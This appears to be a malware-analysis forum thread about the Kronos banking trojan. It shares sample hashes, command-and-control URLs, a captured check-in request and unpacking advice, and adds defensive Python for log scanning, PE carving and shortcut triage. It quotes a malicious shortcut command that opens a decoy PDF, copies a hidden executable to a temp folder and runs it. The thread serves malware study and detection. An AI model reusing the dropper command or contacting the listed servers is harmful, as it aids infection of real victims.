Kronos

Forum for analysis and discussion about malware.

Kronos

Postby Intimacygel » Tue Jul 15, 2014 1:49 pm

Hi All,

Was wondering if anyone has heard of or seen samples of the supposed replacement for Zeus, "Kronos".

http://www.csoonline.com/article/245363 ... um=twitter


Thanks!
Intimacygel
 
Posts: 24
Joined: Wed Jun 05, 2013 3:16 pm
Reputation point: 4

Re: Kronos

Postby Sargerras » Tue Aug 05, 2014 9:30 am

Hi, just bringing this thread up.
http://securityblog.s21sec.com/2014/08/ ... -here.html

Sample of Kronos attached.

MD5: f085395253a40ce8ca077228c2322010
www.virustotal.com/file/9806d1b664c7371 ... /analysis/
Sargerras
 
Posts: 9
Joined: Mon May 13, 2013 12:23 pm
Reputation point: 3

Re: Kronos

Postby Kafeine » Tue Jan 27, 2015 6:57 pm

A fresh one (pushed in Sweet Orange).

01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
Kafeine
 
Posts: 105
Joined: Thu Jul 28, 2011 1:19 pm
Reputation point: 74

Variant of Zbot

Postby pwnslinger » Wed Nov 25, 2015 6:50 pm

Hi,
It uses a VB6 packing method and executes shellcode which is packed by MoleBox or something like that (PUSHAD, CALL).
But I don't know why I just got into this loop; it enumerates through all procedure names...
Hint me, please.

sample also attached below:
pwnslinger
 
Posts: 9
Joined: Mon May 04, 2015 5:27 pm
Reputation point: 0

Re: Variant of Zbot

Postby comak » Thu Nov 26, 2015 11:14 am

This is Kronos,

http://bitcoind.su:80/krpanel/connect.php
http://bulletvpn.su:80/krpanel/connect.php
http://thereturn15.su:80/krpanel/connect.php
http://skycard.su:80/krpanel/connect.php
http://cyberhosting.su:80/krpanel/connect.php
http://skycard.su:80/krpanel/connect.php


cheers,
mak
comak
 
Posts: 43
Joined: Mon Oct 14, 2013 8:25 am
Reputation point: 31
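Putting Kafeine's proxy-log lines and comak's URL list together, here is an added example (my own code, not posted by anyone in this thread) of the detection logic a defender would run over such logs: it parses the `[**]`-delimited format Kafeine pasted, flags POSTs to `/krpanel/connect.php`, and checks the host against the C2 hosts comak listed. The sample log lines are constructed from the ones above (the redacted source IP is replaced with a made-up one) plus one benign request for contrast.

```python
from urllib.parse import urlparse

# C2 URLs exactly as comak listed them in this thread.
KRONOS_C2_URLS = [
    "http://bitcoind.su:80/krpanel/connect.php",
    "http://bulletvpn.su:80/krpanel/connect.php",
    "http://thereturn15.su:80/krpanel/connect.php",
    "http://skycard.su:80/krpanel/connect.php",
    "http://cyberhosting.su:80/krpanel/connect.php",
]
KRONOS_C2_HOSTS = {urlparse(u).hostname for u in KRONOS_C2_URLS}
KRONOS_PANEL_PATH = "/krpanel/connect.php"

# Constructed sample lines in the format Kafeine posted (9 fields separated by
# " [**] "). The redacted source IP is replaced with 192.168.1.10 (made up) and
# the third line is a constructed benign request.
SAMPLE_LOG = """\
01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.1.10:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.1.10:1035 -> 92.87.96.9:80
01/27/2015-08:16:01.000000 www.example.com [**] /index.html [**] Mozilla/5.0 (Windows NT 6.1) [**] <no referer> [**] GET [**] HTTP/1.1 [**] 200 [**] 1200 bytes [**] 192.168.1.10:1036 -> 93.184.216.34:80
"""

FIELD_SEP = " [**] "


def parse_log_line(line):
    """Split one proxy-log line into a dict; return None for malformed lines."""
    parts = line.rstrip("\r\n").split(FIELD_SEP)
    if len(parts) != 9:
        return None
    ts_host, uri, ua, referer, method, version, status, size, flow = parts
    ts, _, host = ts_host.partition(" ")        # "timestamp host" share field 1
    src, _, dst = flow.partition(" -> ")         # "src:port -> dst:port"
    return {"ts": ts, "host": host.lower(), "uri": uri, "ua": ua,
            "referer": referer, "method": method, "version": version,
            "status": status, "size": size, "src": src, "dst": dst}


def classify(rec):
    """Return the reasons a record looks like a Kronos check-in (empty = clean)."""
    reasons = []
    path = rec["uri"].split("?", 1)[0]          # drop the "?a=1" style query string
    if rec["method"] == "POST" and path == KRONOS_PANEL_PATH:
        reasons.append("kronos_panel_path")
    if rec["host"] in KRONOS_C2_HOSTS:
        reasons.append("known_kronos_c2_host")
    return reasons


def scan(log_text):
    """Run classify() over every parsable line and collect the hits."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.append({"ts": rec["ts"], "host": rec["host"], "uri": rec["uri"],
                         "dst": rec["dst"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The path check on its own is the weaker of the two signals (any site could serve a `/krpanel/connect.php`), so the two reasons are reported separately; the host list is the one that should be kept current as new panels like the ones comak posted turn up.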

Re: Variant of Zbot

Postby EP_X0FF » Thu Nov 26, 2015 11:33 am

pwnslinger wrote:Hi,
It uses a VB6 packing method and executes shellcode which is packed by MoleBox or something like that (PUSHAD, CALL).
But I don't know why I just got into this loop; it enumerates through all procedure names...
Hint me, please.

sample also attached below:


As with most malware crypters used for ZBot, its "decryption" is based on the moment when RunPE is executed. Set a breakpoint on CreateProcess and dump the memory region it will attempt to write to the zombie target process.

https://www.virustotal.com/en/file/e4e0 ... 448537374/

"Unpacked" Kronos in attach. Posts moved.
Ring0 - the source of inspiration
EP_X0FF
Global Moderator
 
Posts: 4764
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 571
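EP_X0FF's hint is to break on CreateProcess and dump the buffer the crypter is about to write into the zombie process. What comes back is normally the raw file-layout PE with junk around it, and the practical next step is to carve it out. The block below is an added example (my own code, not EP_X0FF's and not from any sample in this thread): it walks the section table of each `MZ`/`PE` candidate to find the image's true end, and it builds a tiny constructed PE32 purely as test data so the carver can be run offline.

```python
import struct


def build_test_pe():
    """Construct a tiny, non-runnable PE32 in file layout as test data
    (MZ stub, PE signature, COFF header, optional header, two sections).
    This is made-up test input, not a real Kronos image."""
    sections = [(b".text", b"\xcc" * 0x40), (b".data", b"KRONOS-TEST" + b"\0" * 5)]
    e_lfanew, size_of_opt, file_align = 0x40, 0xE0, 0x200
    section_table = e_lfanew + 4 + 20 + size_of_opt
    size_of_headers = (section_table + 40 * len(sections) + file_align - 1) & ~(file_align - 1)

    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    dos[0x3C:0x40] = struct.pack("<I", e_lfanew)
    # Machine=i386, NumberOfSections, TimeDateStamp, PtrToSymtab, NumSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_of_opt, 0x0102)
    opt = bytearray(size_of_opt)
    struct.pack_into("<H", opt, 0, 0x10B)              # PE32 magic
    struct.pack_into("<I", opt, 28, 0x400000)          # ImageBase
    struct.pack_into("<I", opt, 32, 0x1000)            # SectionAlignment
    struct.pack_into("<I", opt, 36, file_align)        # FileAlignment
    struct.pack_into("<I", opt, 60, size_of_headers)   # SizeOfHeaders

    sec_hdrs, body, raw_ptr, va = b"", b"", size_of_headers, 0x1000
    for name, data in sections:
        raw_size = (len(data) + file_align - 1) & ~(file_align - 1)
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, reloc/lineno ptrs+counts, Characteristics
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), va,
                                raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va += 0x1000
    struct.pack_into("<I", opt, 56, va)                # SizeOfImage
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec_hdrs
    return headers.ljust(size_of_headers, b"\0") + body


def carve_pe_images(blob):
    """Return (offset, image_bytes) for every file-layout PE embedded in blob.

    The image ends at max(PointerToRawData + SizeOfRawData) over its sections,
    which is exactly the span a RunPE loader feeds to WriteProcessMemory."""
    found, pos = [], 0
    while True:
        pos = blob.find(b"MZ", pos)
        if pos < 0 or pos + 0x40 > len(blob):
            break
        try:
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            pe = pos + e_lfanew
            if 0x40 <= e_lfanew < 0x1000 and blob[pe:pe + 4] == b"PE\0\0":
                nsec = struct.unpack_from("<H", blob, pe + 6)[0]
                opt_size = struct.unpack_from("<H", blob, pe + 20)[0]
                magic = struct.unpack_from("<H", blob, pe + 24)[0]
                if magic in (0x10B, 0x20B) and 0 < nsec <= 96:   # PE32 or PE32+
                    end = struct.unpack_from("<I", blob, pe + 24 + 60)[0]  # SizeOfHeaders
                    sec_tab = pe + 24 + opt_size
                    for i in range(nsec):
                        raw_size, raw_ptr = struct.unpack_from("<II", blob, sec_tab + 40 * i + 16)
                        end = max(end, raw_ptr + raw_size)
                    if 0 < end and pos + end <= len(blob):
                        found.append((pos, bytes(blob[pos:pos + end])))
                        pos += end            # skip past this image before searching on
                        continue
        except struct.error:
            pass                              # header ran off the end: not a real image
        pos += 1
    return found


if __name__ == "__main__":
    dump = b"\x90" * 0x123 + build_test_pe() + b"\0" * 0x50   # constructed "memory dump"
    for off, img in carve_pe_images(dump):
        print(f"PE at offset {off:#x}, {len(img)} bytes")
```

One caveat when using this on a real dump: if the crypter has already laid the image out by `VirtualAddress` (i.e. you dumped the mapped copy rather than the raw buffer), the file offsets in the section table no longer match the data and the sections have to be re-pointed to their virtual addresses before the carved file will load in IDA.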

Re: Kronos

Postby henices » Thu Dec 03, 2015 2:13 am

Kafeine wrote:A fresh one (pushed in Sweet Orange).

01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80


POST /krpanel/connect.php HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0)
Host: bitcoind.su
Content-Length: 74
Cache-Control: no-cache 

WzW,c`cfgcgzcozccazedzeefdfdb*W


attachment is the report.
henices
 
Posts: 3
Joined: Fri Aug 01, 2014 7:29 am
Reputation point: 0

Re: Variant of Zbot

Postby pwnslinger » Thu Dec 03, 2015 8:07 pm

EP_X0FF wrote:
pwnslinger wrote:Hi,
It uses a VB6 packing method and executes shellcode which is packed by MoleBox or something like that (PUSHAD, CALL).
But I don't know why I just got into this loop; it enumerates through all procedure names...
Hint me, please.

sample also attached below:


As with most malware crypters used for ZBot, its "decryption" is based on the moment when RunPE is executed. Set a breakpoint on CreateProcess and dump the memory region it will attempt to write to the zombie target process.

https://www.virustotal.com/en/file/e4e0 ... 448537374/

"Unpacked" Kronos in attach. Posts moved.


Thanks EP. ;)

After dumping the second stage (explorer.exe) (changing the EP to PUSH/RET) using the EBFE method for attaching with OllyDbg.
I don't know why, when I want to toggle a bp on code, Olly can't and just runs (memory regions are RWC!).
Then I used F4 (run till selection) and a hw bp.
But when it calls SYSENTER... I can't take control back.
pwnslinger
 
Posts: 9
Joined: Mon May 04, 2015 5:27 pm
Reputation point: 0

Re: Kronos

Postby pwnslinger » Fri Feb 12, 2016 10:27 am

I got another variant of Zbot on my system today.
The .rsrc section is base64 encoded. First I thought about the Ranbyus banking trojan.
Also a shortcut is created for running the malware, with this content:

%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe /c "start %cd%Statically_detecting_use_after_free_on_binary_code.pdf & attrib -s -h %cd%DqGLtNo.exe & xcopy /F /S /Q /H /R /Y %cd%DqGLtNo.exe %temp%\JHQtm\ & attrib +s +h %cd%DqGLtNo.exe & start %temp%\JHQtm\Dq

The export table contains a callback function. I checked it with IDA and I didn't see any useful call.
Where should I start?


sample attached.
pwnslinger
 
Posts: 9
Joined: Mon May 04, 2015 5:27 pm
Reputation point: 0
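The shortcut pwnslinger pasted is a five-step `cmd.exe /c` chain: open a decoy document, unhide the dropped executable, `xcopy` it into `%temp%`, hide it again, and start the copy from `%temp%`. Below is an added example (my own code, not pwnslinger's and not derived from the sample) of how a triage script can decompose such an LNK command line into its steps and score the decoy-then-stage-then-execute pattern. The command line in the block is constructed with placeholder file names so as not to guess at the truncated original.

```python
import re

# Constructed command line with the same shape as the shortcut posted above;
# "decoy.pdf", "payload.exe" and "%temp%\stage\" are made-up placeholders.
SAMPLE_LNK_CMDLINE = (
    r'%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe /c "start %cd%decoy.pdf & '
    r'attrib -s -h %cd%payload.exe & xcopy /F /S /Q /H /R /Y %cd%payload.exe %temp%\stage\ & '
    r'attrib +s +h %cd%payload.exe & start %temp%\stage\payload.exe"'
)

DOC_EXT = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf", ".txt")
EXEC_EXT = (".exe", ".scr", ".com", ".bat", ".cmd", ".js", ".vbs")
SUSPICIOUS_STEPS = {"open_decoy_document", "unhide_file", "copy_to_temp", "execute_from_temp"}


def split_cmd_chain(cmdline):
    """Return the individual commands a 'cmd.exe /c "a & b & c"' line would run.
    Splits on '&' outside double quotes; returns [] if there is no cmd /c at all."""
    m = re.search(r"cmd(?:\.exe)?\s+/c\s+", cmdline, re.IGNORECASE)
    if not m:
        return []
    body = cmdline[m.end():].strip()
    if len(body) >= 2 and body[0] == '"' and body[-1] == '"':
        body = body[1:-1]                      # outer quotes wrap the whole chain
    cmds, cur, in_quotes = [], [], False
    for ch in body:
        if ch == '"':
            in_quotes = not in_quotes
        if ch == "&" and not in_quotes:
            cmds.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    tail = "".join(cur).strip()
    if tail:
        cmds.append(tail)
    return [c for c in cmds if c]


def classify_step(cmd):
    """Label one command of the chain by what it does in the infection flow."""
    verb, _, args = cmd.partition(" ")
    verb, a = verb.lower(), args.strip().lower()
    if verb == "start" and a.endswith(DOC_EXT):
        return "open_decoy_document"           # the lure the victim expected to open
    if verb == "attrib" and "-h" in a.split():
        return "unhide_file"                   # payload was shipped system+hidden
    if verb == "attrib" and "+h" in a.split():
        return "rehide_file"
    if verb == "xcopy" and "%temp%" in a:
        return "copy_to_temp"                  # staging outside the removable/download dir
    if verb == "start" and a.endswith(EXEC_EXT) and "%temp%" in a:
        return "execute_from_temp"
    return "other"


def score_lnk_cmdline(cmdline):
    """Return (ordered step labels, number of distinct suspicious stages seen)."""
    steps = [classify_step(c) for c in split_cmd_chain(cmdline)]
    return steps, len(SUSPICIOUS_STEPS & set(steps))


if __name__ == "__main__":
    steps, score = score_lnk_cmdline(SAMPLE_LNK_CMDLINE)
    for s in steps:
        print(s)
    print("suspicious stages:", score)
```

A score of 3 or more out of the 4 stages is a strong indication of a decoy-document dropper regardless of the file names used; the `rehide_file` step is tracked only so the full sequence is visible in the output.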

Re: Kronos

Postby puzzlex » Fri Feb 12, 2016 1:18 pm

This DqGLtNo.exe is packed multiple times. Here is the final payload: https://www.virustotal.com/en/file/18f8 ... /analysis/
puzzlex
 
Posts: 20
Joined: Tue Oct 20, 2015 12:22 pm
Reputation point: 2
